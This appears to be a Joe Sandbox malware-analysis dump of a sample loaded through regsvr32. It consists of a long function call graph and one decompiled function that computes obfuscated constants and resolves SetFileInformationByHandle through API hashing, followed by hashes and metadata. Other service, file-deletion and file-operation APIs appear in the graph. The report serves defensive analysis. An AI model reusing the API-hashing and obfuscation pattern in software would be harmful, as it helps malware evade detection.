4182->4183 4184 58bff0 GetPEB 4183->4184 4185 57337c OpenSCManagerW 4184->4185 4185->3952 4189 574fae 4186->4189 4190 579574 GetPEB 4189->4190 4191 575080 4189->4191 4201 58ade9 4189->4201 4205 5907bb 4189->4205 4190->4189 4191->3952 4209 57645e 4192->4209 4196 58eb9a 4196->3952 4198 57958e 4197->4198 4216 579aac 4198->4216 4202 58ae00 4201->4202 4203 58bff0 GetPEB 4202->4203 4204 58aea1 4203->4204 4204->4189 4206 5907d1 4205->4206 4207 58bff0 GetPEB 4206->4207 4208 590861 4207->4208 4208->4189 4210 58bff0 GetPEB 4209->4210 4211 5764fc 4210->4211 4212 581b22 4211->4212 4213 581b41 4212->4213 4214 58bff0 GetPEB 4213->4214 4215 581bdd RtlAllocateHeap 4214->4215 4215->4196 4217 579ace 4216->4217 4218 58bff0 GetPEB 4217->4218 4219 579601 4218->4219 4219->3957 4221 574bce 4220->4221 4222 58eaa3 2 API calls 4221->4222 4223 574c3e 4222->4223 4223->3969 4223->4223 4225 57d6aa 4224->4225 4226 58bff0 GetPEB 4225->4226 4227 57d746 4226->4227 4227->3969 4229 57c728 4228->4229 4230 58bff0 GetPEB 4229->4230 4231 57c7bd 4230->4231 4231->3969 4233 57d5e4 4232->4233 4234 58bff0 GetPEB 4233->4234 4235 57d67d 4234->4235 4235->3971 4237 57b9e9 4236->4237 4238 576a8d GetPEB 4237->4238 4239 57ba1e 4238->4239 4239->3969 4241 576a9d 4240->4241 4242 57645e GetPEB 4241->4242 4243 576bbb 4242->4243 4246 5850b6 4243->4246 4247 5850d5 4246->4247 4248 58bff0 GetPEB 4247->4248 4249 576bd4 4248->4249 4249->3972 4251 57c507 4250->4251 4252 58bff0 GetPEB 4251->4252 4253 57c5b2 OpenServiceW 4252->4253 4253->3977 4255 581089 4254->4255 4256 58bff0 GetPEB 4255->4256 4257 581122 4256->4257 4257->3977 4259 57d35d 4258->4259 4260 574bb4 2 API calls 4259->4260 4261 57d4ea 4260->4261 4286 57fd5f 4261->4286 4264 57b9d7 GetPEB 4265 57d516 4264->4265 4290 579ea8 4265->4290 4267 57d52a 4267->3983 4269 591128 4268->4269 4270 57b184 GetPEB 4269->4270 4271 59135e 4270->4271 4272 57b184 GetPEB 4271->4272 4273 591378 4272->4273 4274 57b184 GetPEB 4273->4274 4275 59138d 4274->4275 4276 5907bb GetPEB 4275->4276 4277 
5913a2 4276->4277 4278 5907bb GetPEB 4277->4278 4279 5913ba 4278->4279 4297 57338b 4279->4297 4281 5913f0 4281->3985 4283 58736f 4282->4283 4284 57f56b GetPEB 4283->4284 4285 58738c 4284->4285 4285->3985 4287 57fd7b 4286->4287 4294 57f56b 4287->4294 4291 579ebe 4290->4291 4292 58bff0 GetPEB 4291->4292 4293 579f4d DeleteFileW 4292->4293 4293->4267 4295 58bff0 GetPEB 4294->4295 4296 57d507 4295->4296 4296->4264 4298 57339b 4297->4298 4299 58bff0 GetPEB 4298->4299 4300 573449 SHFileOperationW 4299->4300 4300->4281 4302 58bff0 GetPEB 4301->4302 4303 575939 4302->4303 4303->3993 4305 58bff0 GetPEB 4304->4305 4306 57f361 4305->4306 4306->3993 4308 581c12 4307->4308 4309 57f56b GetPEB 4308->4309 4310 581c34 4309->4310 4310->3993 4312 57f1fa 4311->4312 4313 58bff0 GetPEB 4312->4313 4314 57f2a8 SetFileInformationByHandle 4313->4314 4314->4005 4316 58bf49 4315->4316 4317 58bff0 GetPEB 4316->4317 4318 58bfd6 CreateFileW 4317->4318 4318->4005 4320 58190a 4319->4320 4321 58bff0 GetPEB 4320->4321 4322 581999 4321->4322 4322->4005 4324 58ba53 4323->4324 4325 58bff0 GetPEB 4324->4325 4326 58bae0 4325->4326 4326->4015 4334 573537 4327->4334 4328 573c34 4330 576a8d GetPEB 4328->4330 4329 58eaa3 RtlAllocateHeap GetPEB 4329->4334 4333 573c45 4330->4333 4331 576a8d GetPEB 4331->4334 4333->4023 4334->4328 4334->4329 4334->4331 4334->4333 4336 58a98e 2 API calls 4334->4336 4337 57c4eb 2 API calls 4334->4337 4339 57f2b9 GetPEB 4334->4339 4344 58b14e 4334->4344 4348 5813d4 4334->4348 4352 58a3e6 4334->4352 4336->4334 4337->4334 4339->4334 4341 57411c 4340->4341 4342 58bff0 GetPEB 4341->4342 4343 57419f 4342->4343 4343->4023 4345 58b16a 4344->4345 4346 58bff0 GetPEB 4345->4346 4347 58b205 4346->4347 4347->4334 4349 58140f 4348->4349 4350 58bff0 GetPEB 4349->4350 4351 5814bb 4350->4351 4351->4334 4353 58a415 4352->4353 4354 58bff0 GetPEB 4353->4354 4355 58a4a0 4354->4355 4355->4334 4357 574640 4356->4357 4360 581d1c 4357->4360 4361 581d3a 4360->4361 4364 572fe6 4361->4364 4365 573002 
4364->4365 4366 58bff0 GetPEB 4365->4366 4367 5730ae 4366->4367 4367->4040 4369 57fff1 4368->4369 4370 58bff0 GetPEB 4369->4370 4371 58008b 4370->4371 4371->4059 4379 585d94 4372->4379 4373 5863d3 4392 57428c 4373->4392 4375 5863d1 4375->4059 4376 574bb4 RtlAllocateHeap GetPEB 4376->4379 4379->4373 4379->4375 4379->4376 4380 58734a GetPEB 4379->4380 4381 57fd5f GetPEB 4379->4381 4382 585d68 2 API calls 4379->4382 4383 57b9d7 GetPEB 4379->4383 4384 57fa6c 4379->4384 4388 57fe4b 4379->4388 4380->4379 4381->4379 4382->4379 4383->4379 4385 57fa85 4384->4385 4386 58bff0 GetPEB 4385->4386 4387 57fb15 4386->4387 4387->4379 4389 57fe5e 4388->4389 4390 58bff0 GetPEB 4389->4390 4391 57fef3 4390->4391 4391->4379 4393 5742a5 4392->4393 4394 58bff0 GetPEB 4393->4394 4395 574337 4394->4395 4395->4375 4397 57c635 4396->4397 4398 57c61f 4396->4398 4397->4069 4398->4397 4399 576a8d GetPEB 4398->4399 4399->4398 4401 585047 4400->4401 4414 580b4c 4401->4414 4411 59252f 4404->4411 4405 574bb4 2 API calls 4405->4411 4406 592704 4406->4069 4407 5926f3 4409 576a8d GetPEB 4407->4409 4409->4406 4410 58eaa3 2 API calls 4410->4411 4411->4405 4411->4406 4411->4407 4411->4410 4412 57b9d7 GetPEB 4411->4412 4516 58acff 4411->4516 4520 57c453 4411->4520 4412->4411 4415 580b68 4414->4415 4417 580c59 4415->4417 4420 580c57 4415->4420 4421 58eaa3 2 API calls 4415->4421 4423 577786 4415->4423 4440 57508b 4415->4440 4449 573210 4415->4449 4419 576a8d GetPEB 4417->4419 4419->4420 4420->4069 4421->4415 4434 57842c 4423->4434 4424 5788b0 4425 57d5cb GetPEB 4424->4425 4428 5788ae 4425->4428 4427 57f36a GetPEB 4427->4434 4428->4415 4431 574bb4 RtlAllocateHeap GetPEB 4431->4434 4434->4424 4434->4427 4434->4428 4434->4431 4437 581d1c GetPEB 4434->4437 4438 57d68b GetPEB 4434->4438 4439 57b9d7 GetPEB 4434->4439 4454 579f58 4434->4454 4458 57bd30 4434->4458 4462 57b40a 4434->4462 4466 57fd9d 4434->4466 4470 587473 4434->4470 4496 574d7d 4434->4496 4500 58677f 4434->4500 4437->4434 4438->4434 4439->4434 4448 
5755c3 4440->4448 4441 57575d 4443 57d5cb GetPEB 4441->4443 4442 57575b 4442->4415 4443->4442 4444 574bb4 RtlAllocateHeap GetPEB 4444->4448 4445 57d68b GetPEB 4445->4448 4446 57b40a GetPEB 4446->4448 4447 57b9d7 GetPEB 4447->4448 4448->4441 4448->4442 4448->4444 4448->4445 4448->4446 4448->4447 4450 58677f GetPEB 4449->4450 4451 57329c 4450->4451 4452 576a8d GetPEB 4451->4452 4453 5732af 4452->4453 4453->4415 4455 579f7a 4454->4455 4456 58bff0 GetPEB 4455->4456 4457 57a009 4456->4457 4457->4434 4459 57bd52 4458->4459 4460 58bff0 GetPEB 4459->4460 4461 57bdf5 4460->4461 4461->4434 4463 57b43a 4462->4463 4464 58bff0 GetPEB 4463->4464 4465 57b4e0 4464->4465 4465->4434 4467 57fdb3 4466->4467 4468 58bff0 GetPEB 4467->4468 4469 57fe3d 4468->4469 4469->4434 4475 588307 4470->4475 4471 57d5cb GetPEB 4471->4475 4472 576a8d GetPEB 4472->4475 4473 574bb4 RtlAllocateHeap GetPEB 4493 5886af 4473->4493 4474 588558 4479 574bb4 2 API calls 4474->4479 4475->4471 4475->4472 4475->4474 4477 5887d6 4475->4477 4478 58eaa3 2 API calls 4475->4478 4482 574bb4 RtlAllocateHeap GetPEB 4475->4482 4483 57b9d7 GetPEB 4475->4483 4475->4493 4504 578ab6 4475->4504 4508 5765d5 4475->4508 4477->4434 4478->4475 4480 588578 4479->4480 4481 574bb4 2 API calls 4480->4481 4485 58859a 4481->4485 4482->4475 4483->4475 4484 57d68b GetPEB 4484->4493 4486 58ade9 GetPEB 4485->4486 4488 5885c6 4486->4488 4512 58cfc3 4488->4512 4490 57b9d7 GetPEB 4490->4493 4492 57b9d7 GetPEB 4494 588697 4492->4494 4493->4473 4493->4484 4493->4490 4495 57b9d7 GetPEB 4494->4495 4495->4493 4497 574dad 4496->4497 4498 58bff0 GetPEB 4497->4498 4499 574e5c 4498->4499 4499->4434 4501 586792 4500->4501 4502 58bff0 GetPEB 4501->4502 4503 586834 4502->4503 4503->4434 4505 578af6 4504->4505 4506 58bff0 GetPEB 4505->4506 4507 578baa 4506->4507 4507->4475 4509 576602 4508->4509 4510 58bff0 GetPEB 4509->4510 4511 576697 4510->4511 4511->4475 4513 58cff4 4512->4513 4514 58bff0 GetPEB 4513->4514 4515 588667 4514->4515 4515->4492 4517 58ad1f 
4516->4517 4518 58eaa3 2 API calls 4517->4518 4519 58ad9c 4518->4519 4519->4411 4519->4519 4521 57c481 4520->4521 4522 57f56b GetPEB 4521->4522 4523 57c4a8 4522->4523 4523->4411 4525 590343 4524->4525 4526 58bff0 GetPEB 4525->4526 4527 5903e4 4526->4527 4527->4073 4529 58aa83 4528->4529 4530 58bff0 GetPEB 4529->4530 4531 58ab22 4530->4531 4531->4073 4543 583cdd 4532->4543 4536 580c9d 4535->4536 4566 57f43b 4536->4566 4539 580e00 4539->4083 4542 58e373 2 API calls 4542->4539 4546 583d02 4543->4546 4548 583f17 4546->4548 4550 57ba93 4546->4550 4552 575942 4546->4552 4555 581a72 4546->4555 4559 58efa0 4546->4559 4563 57b34c 4546->4563 4551 58e373 2 API calls 4548->4551 4550->4083 4551->4550 4553 57588d GetPEB 4552->4553 4554 57597a 4553->4554 4554->4546 4556 581a88 4555->4556 4557 58bff0 GetPEB 4556->4557 4558 581b14 4557->4558 4558->4546 4560 58efb9 4559->4560 4561 58bff0 GetPEB 4560->4561 4562 58f052 4561->4562 4562->4546 4564 58bff0 GetPEB 4563->4564 4565 57b3f2 4564->4565 4565->4546 4567 58bff0 GetPEB 4566->4567 4568 57f4f2 4567->4568 4568->4539 4569 5814da 4568->4569 4570 5814f9 4569->4570 4571 58bff0 GetPEB 4570->4571 4572 580dee 4571->4572 4572->4542 4574 573f42 4573->4574 4575 58bff0 GetPEB 4574->4575 4576 573ff1 4575->4576 4576->4092 4578 591cd8 4577->4578 4579 58bff0 GetPEB 4578->4579 4580 591d53 4579->4580 4580->4092 4582 573169 4581->4582 4583 58bff0 GetPEB 4582->4583 4584 573203 4583->4584 4584->4092 4600 57a07f 4585->4600 4586 585b4c GetPEB 4586->4600 4588 57b074 4682 585b4c 4588->4682 4591 574bb4 2 API calls 4591->4600 4592 57b08a 4592->4105 4597 576a8d GetPEB 4597->4600 4598 57b9d7 GetPEB 4598->4600 4600->4586 4600->4588 4600->4591 4600->4592 4600->4597 4600->4598 4601 58e29a GetPEB 4600->4601 4650 5841cf 4600->4650 4659 575797 4600->4659 4663 575b8a 4600->4663 4666 576505 4600->4666 4670 57400f 4600->4670 4674 58aeae 4600->4674 4678 58b215 4600->4678 4601->4600 4610 592a55 4602->4610 4604 58eaa3 2 API calls 4604->4610 4605 592bb0 4606 576a8d GetPEB 
4605->4606 4607 592bae 4606->4607 4607->4105 4608 574bb4 2 API calls 4608->4610 4609 57f56b GetPEB 4609->4610 4610->4604 4610->4605 4610->4607 4610->4608 4610->4609 4611 57b9d7 GetPEB 4610->4611 4694 5851e8 4610->4694 4611->4610 4626 589fc8 4612->4626 4613 576a8d GetPEB 4613->4626 4614 58a353 4615 58e18b 2 API calls 4614->4615 4617 58a379 4615->4617 4616 581d1c GetPEB 4616->4626 4713 57c4b0 4617->4713 4618 58eaa3 RtlAllocateHeap GetPEB 4618->4626 4620 58a34e 4620->4105 4622 574bb4 2 API calls 4622->4626 4625 57b9d7 GetPEB 4625->4620 4626->4613 4626->4614 4626->4616 4626->4618 4626->4620 4626->4622 4627 57f56b GetPEB 4626->4627 4628 57b9d7 GetPEB 4626->4628 4705 58e18b 4626->4705 4709 589556 4626->4709 4627->4626 4628->4626 4630 5891ae 4629->4630 4631 589537 4630->4631 4634 589535 4630->4634 4636 58eaa3 2 API calls 4630->4636 4637 581d1c GetPEB 4630->4637 4717 5816ad 4630->4717 4723 579617 4630->4723 4633 576a8d GetPEB 4631->4633 4633->4634 4634->4105 4636->4630 4637->4630 4644 5847fd 4638->4644 4640 58500a 4643 576a8d GetPEB 4640->4643 4648 58501e 4643->4648 4644->4640 4645 581d1c GetPEB 4644->4645 4646 576a8d GetPEB 4644->4646 4647 57e379 2 API calls 4644->4647 4644->4648 4649 58eaa3 2 API calls 4644->4649 4765 574342 4644->4765 4770 58a4b5 4644->4770 4777 578bcb 4644->4777 4645->4644 4646->4644 4647->4644 4648->4105 4649->4644 4651 584420 4650->4651 4652 58eaa3 RtlAllocateHeap GetPEB 4651->4652 4653 584518 4651->4653 4657 581d1c GetPEB 4651->4657 4658 576a8d GetPEB 4651->4658 4686 577209 4651->4686 4652->4651 4655 584520 4653->4655 4656 576a8d GetPEB 4653->4656 4655->4600 4656->4655 4657->4651 4658->4651 4660 5757d2 4659->4660 4661 58bff0 GetPEB 4660->4661 4662 575872 4661->4662 4662->4600 4690 591933 4663->4690 4667 57652a 4666->4667 4668 58bff0 GetPEB 4667->4668 4669 5765c3 4668->4669 4669->4600 4671 574036 4670->4671 4672 58bff0 GetPEB 4671->4672 4673 5740bd 4672->4673 4673->4600 4675 58aedf 4674->4675 4676 58bff0 GetPEB 4675->4676 4677 58af74 4676->4677 
4677->4600 4679 58b237 4678->4679 4680 58bff0 GetPEB 4679->4680 4681 58b2e9 4680->4681 4681->4600 4683 585b62 4682->4683 4684 58bff0 GetPEB 4683->4684 4685 585bfa 4684->4685 4685->4592 4687 57722b 4686->4687 4688 58bff0 GetPEB 4687->4688 4689 5772b9 4688->4689 4689->4651 4691 591957 4690->4691 4692 58bff0 GetPEB 4691->4692 4693 575c87 4692->4693 4693->4600 4698 5851fe 4694->4698 4695 58545d 4697 57c63a GetPEB 4695->4697 4696 58545b 4696->4610 4697->4696 4698->4695 4698->4696 4700 58eaa3 2 API calls 4698->4700 4701 57c63a 4698->4701 4700->4698 4702 57c662 4701->4702 4703 58bff0 GetPEB 4702->4703 4704 57c6f0 4703->4704 4704->4698 4706 58e1a5 4705->4706 4707 58eaa3 2 API calls 4706->4707 4708 58e230 4707->4708 4708->4626 4708->4708 4710 58957e 4709->4710 4711 57f56b GetPEB 4710->4711 4712 5895a0 4711->4712 4712->4626 4714 57c4c9 4713->4714 4715 57f56b GetPEB 4714->4715 4716 57c4e3 4715->4716 4716->4625 4721 5816c7 4717->4721 4718 5818a9 4745 58595c 4718->4745 4719 5818a7 4719->4630 4721->4718 4721->4719 4730 57e379 4721->4730 4725 579644 4723->4725 4724 58eaa3 2 API calls 4724->4725 4725->4724 4726 5812ef GetPEB 4725->4726 4727 579985 4725->4727 4728 579996 4725->4728 4726->4725 4729 576a8d GetPEB 4727->4729 4728->4630 4729->4728 4737 57e3b8 4730->4737 4731 57f19d 4732 57d5cb GetPEB 4731->4732 4734 57f19b 4732->4734 4733 574bb4 RtlAllocateHeap GetPEB 4733->4737 4734->4721 4736 58eaa3 2 API calls 4736->4737 4737->4731 4737->4733 4737->4734 4737->4736 4739 5765d5 GetPEB 4737->4739 4740 576a8d GetPEB 4737->4740 4743 57d68b GetPEB 4737->4743 4744 57b9d7 GetPEB 4737->4744 4749 5741c6 4737->4749 4753 57b8f4 4737->4753 4757 57fb23 4737->4757 4761 58ac2c 4737->4761 4739->4737 4740->4737 4743->4737 4744->4737 4746 585988 4745->4746 4747 58bff0 GetPEB 4746->4747 4748 585a2b 4747->4748 4748->4719 4750 5741eb 4749->4750 4751 58bff0 GetPEB 4750->4751 4752 574279 4751->4752 4752->4737 4754 57b919 4753->4754 4755 58bff0 GetPEB 4754->4755 4756 57b9c4 4755->4756 4756->4737 4758 57fb3c 
4757->4758 4759 58bff0 GetPEB 4758->4759 4760 57fbed 4759->4760 4760->4737 4762 58ac56 4761->4762 4763 58bff0 GetPEB 4762->4763 4764 58ace2 4763->4764 4764->4737 4769 574361 4765->4769 4766 5745f4 4766->4644 4767 574627 GetPEB 4767->4769 4768 58eaa3 2 API calls 4768->4769 4769->4766 4769->4767 4769->4768 4772 58a4e1 4770->4772 4771 58e436 GetPEB 4771->4772 4772->4771 4773 58a872 4772->4773 4774 58a861 4772->4774 4775 58eaa3 2 API calls 4772->4775 4773->4644 4776 576a8d GetPEB 4774->4776 4775->4772 4776->4773 4778 578bde 4777->4778 4779 581d1c GetPEB 4778->4779 4780 578c72 4779->4780 4780->4644 4782 59041a 4781->4782 4784 5906d7 4782->4784 4785 590738 4782->4785 4802 576bfa 4782->4802 4786 58e18b 2 API calls 4784->4786 4785->4108 4787 5906f1 4786->4787 4793 58112d 4787->4793 4792 57b9d7 GetPEB 4792->4785 4806 574b09 4793->4806 4796 5812e4 4798 58ef56 4796->4798 4799 58ef7b 4798->4799 4800 57f56b GetPEB 4799->4800 4801 58ef98 4800->4801 4801->4792 4803 576c16 4802->4803 4804 58bff0 GetPEB 4803->4804 4805 576cad 4804->4805 4805->4782 4807 574b23 4806->4807 4808 58bff0 GetPEB 4807->4808 4809 574ba7 4808->4809 4809->4796 4810 58683f 4809->4810 4811 586871 4810->4811 4812 58bff0 GetPEB 4811->4812 4813 586911 4812->4813 4813->4796 4815 57bcba 4814->4815 4816 57bd24 4815->4816 4817 576a8d GetPEB 4815->4817 4818 574cb9 GetPEB 4815->4818 4820 58e373 2 API calls 4815->4820 4908 580f7a 4815->4908 4816->4121 4817->4815 4818->4815 4820->4815 4829 590d01 4821->4829 4822 579574 GetPEB 4822->4829 4823 590d19 4916 5863f0 4823->4916 4825 590d42 4825->4121 4826 57ffde GetPEB 4826->4829 4828 574bb4 2 API calls 4828->4829 4829->4822 4829->4823 4829->4825 4829->4826 4829->4828 4830 58734a GetPEB 4829->4830 4831 57b9d7 GetPEB 4829->4831 4926 57b200 4829->4926 4930 579b80 4829->4930 4830->4829 4831->4829 4941 58e034 4833->4941 4835 5863f0 3 API calls 4836 58fedc 4835->4836 4836->4835 4837 5866c2 2 API calls 4836->4837 4838 58ade9 GetPEB 4836->4838 4839 574bb4 RtlAllocateHeap GetPEB 
4836->4839 4840 5851e8 2 API calls 4836->4840 4841 5902ff 4836->4841 4845 579574 GetPEB 4836->4845 4846 581bed GetPEB 4836->4846 4847 5902fd 4836->4847 4848 576a8d GetPEB 4836->4848 4849 57ffde GetPEB 4836->4849 4850 57b200 GetPEB 4836->4850 4851 58734a GetPEB 4836->4851 4852 57b9d7 GetPEB 4836->4852 4853 579b80 3 API calls 4836->4853 4944 57f784 4836->4944 4950 57d7a6 4836->4950 4837->4836 4838->4836 4839->4836 4840->4836 4843 58e373 2 API calls 4841->4843 4843->4847 4845->4836 4846->4836 4847->4121 4848->4836 4849->4836 4850->4836 4851->4836 4852->4836 4853->4836 4869 572bc8 4854->4869 4855 5863f0 3 API calls 4855->4869 4858 579574 GetPEB 4858->4869 4859 5730be GetPEB 4859->4869 4860 572c31 4860->4121 4860->4860 4861 58e373 GetPEB CloseHandle 4861->4869 4862 57ffde GetPEB 4862->4869 4863 572c16 4865 58e373 2 API calls 4863->4865 4865->4860 4866 57b200 GetPEB 4866->4869 4867 574bb4 2 API calls 4867->4869 4868 58734a GetPEB 4868->4869 4869->4855 4869->4858 4869->4859 4869->4860 4869->4861 4869->4862 4869->4863 4869->4866 4869->4867 4869->4868 4870 57b9d7 GetPEB 4869->4870 4871 579b80 3 API calls 4869->4871 4954 590e6d 4869->4954 4962 57fbf8 4869->4962 4965 57db59 4869->4965 4870->4869 4871->4869 4878 57d206 4872->4878 4873 58aa59 GetPEB 4873->4878 4874 57d24f 4874->4121 4875 57d23b 4877 580f7a GetPEB 4875->4877 4877->4874 4878->4873 4878->4874 4878->4875 4996 573c51 4878->4996 5004 580e0b 4878->5004 4886 591738 4880->4886 4881 591781 4881->4121 4882 58aa59 GetPEB 4882->4886 4883 573c51 GetPEB 4883->4886 4884 59176d 4885 580f7a GetPEB 4884->4885 4885->4881 4886->4881 4886->4882 4886->4883 4886->4884 4887 580e0b GetPEB 4886->4887 4887->4886 4889 58710c 4888->4889 4890 579574 GetPEB 4889->4890 4891 587210 4889->4891 4892 587128 4889->4892 4894 57ffde GetPEB 4889->4894 4897 57b200 GetPEB 4889->4897 4900 574bb4 2 API calls 4889->4900 4903 58734a GetPEB 4889->4903 4906 57b9d7 GetPEB 4889->4906 4907 579b80 3 API calls 4889->4907 4890->4889 4891->4121 4891->4891 4893 
5866c2 2 API calls 4892->4893 4895 58715b 4893->4895 4894->4889 4896 574bb4 2 API calls 4895->4896 4898 58717e 4896->4898 4897->4889 4899 58734a GetPEB 4898->4899 4901 5871be 4899->4901 4900->4889 4902 57b9d7 GetPEB 4901->4902 4904 5871d6 4902->4904 4903->4889 4905 5863f0 3 API calls 4904->4905 4905->4891 4906->4889 4907->4889 4909 580f8d 4908->4909 4912 591bd6 4909->4912 4913 591bf5 4912->4913 4914 58bff0 GetPEB 4913->4914 4915 581069 4914->4915 4915->4815 4917 58641e 4916->4917 4918 57b184 GetPEB 4917->4918 4919 58663b 4918->4919 4920 5846e0 2 API calls 4919->4920 4921 586676 4920->4921 4922 58e373 2 API calls 4921->4922 4925 586683 4921->4925 4923 5866a3 4922->4923 4924 58e373 2 API calls 4923->4924 4924->4925 4925->4825 4927 57b219 4926->4927 4928 57f2b9 GetPEB 4927->4928 4929 57b2e7 4928->4929 4929->4829 4931 579b9f 4930->4931 4933 579e5e 4931->4933 4934 58bf1c 2 API calls 4931->4934 4936 579e5c 4931->4936 4937 58454e 4931->4937 4935 58e373 2 API calls 4933->4935 4934->4931 4935->4936 4936->4829 4938 584575 4937->4938 4939 58bff0 GetPEB 4938->4939 4940 584615 4939->4940 4940->4931 4942 58bff0 GetPEB 4941->4942 4943 58e0c1 4942->4943 4943->4836 4947 57f7a0 4944->4947 4945 57f985 4948 574627 GetPEB 4945->4948 4946 57f983 4946->4836 4947->4945 4947->4946 4949 58eaa3 2 API calls 4947->4949 4948->4946 4949->4947 4951 57d7d6 4950->4951 4952 58bff0 GetPEB 4951->4952 4953 57d87c 4952->4953 4953->4836 4955 590e92 4954->4955 4957 57fbf8 GetPEB 4955->4957 4958 591061 4955->4958 4959 591076 4955->4959 4976 58d0a1 4955->4976 4980 572f1a 4955->4980 4957->4955 4961 58e373 2 API calls 4958->4961 4959->4869 4961->4959 4963 58bff0 GetPEB 4962->4963 4964 57fcac 4963->4964 4964->4869 4967 57db99 4965->4967 4968 57b184 GetPEB 4967->4968 4969 57df48 4967->4969 4971 57e07b 4967->4971 4972 574bb4 2 API calls 4967->4972 4975 57b9d7 GetPEB 4967->4975 4988 585a47 4967->4988 4992 58e8e7 4967->4992 4968->4967 4984 591d6d 4969->4984 4971->4971 4972->4967 4975->4967 4977 58d0bd 4976->4977 
4978 58bff0 GetPEB 4977->4978 4979 58d13e 4978->4979 4979->4955 4981 572f3e 4980->4981 4982 58bff0 GetPEB 4981->4982 4983 572fcc 4982->4983 4983->4955 4985 591d80 4984->4985 4986 58bff0 GetPEB 4985->4986 4987 57df59 4986->4987 4987->4869 4989 585a82 4988->4989 4990 58bff0 GetPEB 4989->4990 4991 585b29 4990->4991 4991->4967 4993 58e902 4992->4993 4994 58bff0 GetPEB 4993->4994 4995 58e994 4994->4995 4995->4967 4997 573c6f 4996->4997 5002 573eff 4997->5002 5009 583ff6 4997->5009 5000 581d1c GetPEB 5001 573eb6 5000->5001 5001->5002 5003 581d1c GetPEB 5001->5003 5002->4878 5003->5001 5007 580e27 5004->5007 5005 58e9a4 GetPEB 5005->5007 5006 580f48 5006->4878 5007->5005 5007->5006 5013 573455 5007->5013 5010 584017 5009->5010 5011 58bff0 GetPEB 5010->5011 5012 573e94 5011->5012 5012->5000 5012->5002 5014 573468 5013->5014 5015 58bff0 GetPEB 5014->5015 5016 573502 5015->5016 5016->5007 5018 58da29 5017->5018 5019 58bff0 GetPEB 5018->5019 5020 573149 5019->5020 5020->3944 5022 585cca 5021->5022 5023 58bff0 GetPEB 5022->5023 5024 585d5a 5023->5024 5024->4136 5026 5800ae 5025->5026 5027 58eaa3 2 API calls 5026->5027 5028 587394 GetPEB 5026->5028 5029 58040e 5026->5029 5027->5026 5028->5026 5029->4136 5031 57f61e 5030->5031 5032 58bff0 GetPEB 5031->5032 5033 57f6be 5032->5033 5033->4136 5035 58bff0 GetPEB 5034->5035 5036 57e370 5035->5036 5036->4136 5038 57f9bd 5037->5038 5039 58bff0 GetPEB 5038->5039 5040 57fa61 5039->5040 5040->4143 5042 585c1b 5041->5042 5043 58bff0 GetPEB 5042->5043 5044 585ca5 5043->5044 5044->4148 5046 57e0fe 5045->5046 5047 58bff0 GetPEB 5046->5047 5048 57e19d 5047->5048 5048->4148 5053 57d8af 5049->5053 5051 57da67 5073 57ff02 5051->5073 5053->5051 5054 57da65 5053->5054 5055 57b184 GetPEB 5053->5055 5069 581c3c 5053->5069 5054->4165 5055->5053 5060 579425 5056->5060 5057 574bb4 2 API calls 5057->5060 5058 573f09 GetPEB 5058->5060 5059 57954c 5061 573152 GetPEB 5059->5061 5060->5057 5060->5058 5060->5059 5062 57b9d7 GetPEB 5060->5062 5063 57954a 
5060->5063 5077 58462a 5060->5077 5061->5063 5062->5060 5063->4165 5066 57f6e5 5065->5066 5067 58bff0 GetPEB 5066->5067 5068 57f778 5067->5068 5068->4171 5070 581c5e 5069->5070 5071 58bff0 GetPEB 5070->5071 5072 581d0f 5071->5072 5072->5053 5074 57ff24 5073->5074 5075 58bff0 GetPEB 5074->5075 5076 57ffca 5075->5076 5076->5054 5078 584649 5077->5078 5079 58bff0 GetPEB 5078->5079 5080 5846d3 5079->5080 5080->5060
C-Code - Quality: 58%
E0057F1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
    signed int _v8;
    unsigned int _v12;
    unsigned int _v16;
    signed int _v20;
    intOrPtr _v24;
    intOrPtr _v28;
    intOrPtr _v32;
    intOrPtr _v36;
    void* _t49;
    intOrPtr* _t58;
    void* _t59;
    signed int _t62;
    void* _t67;
    void* _t68;

    _t68 = __edx;
    _t67 = __ecx;
    E00579E7D(_t49);
    _v36 = 0xea873e;
    _v32 = 0xb2392b;
    _v28 = 0;
    _v24 = 0;
    _v12 = 0xdc192d;
    _v12 = _v12 >> 0xa;
    _v12 = _v12 >> 0xf;
    _v12 = _v12 + 0x11b5;
    _v12 = _v12 ^ 0x0007f5c7;
    _v20 = 0x6dcef4;
    _t62 = 0x6b;
    _v20 = _v20 * 0x54;
    _v20 = _v20 << 0x10;
    _v20 = _v20 ^ 0xe81a0a50;
    _v16 = 0x9ccfab;
    _v16 = _v16 | 0xc76ed5d6;
    _v16 = _v16 >> 0xf;
    _v16 = _v16 ^ 0x000c5bda;
    _v8 = 0xcca784;
    _v8 = _v8 / _t62;
    _v8 = _v8 >> 0xf;
    _v8 = _v8 ^ 0x01549e3f;
    _v8 = _v8 ^ 0x01571d5c;
    _t58 = E0058BFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
    _t59 =  *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
    return _t59;
}


















                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 0057F2B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction ID: b80d3684ce81b213d678b5836033bd956448db1d1fdf8f47dc2ac386acd6874c
                                                                                                                • Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction Fuzzy Hash: 722148B5D0121DAFDB04DF95C88A8EEBFB4FB44708F10809DE515AA250C7B45B54DFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
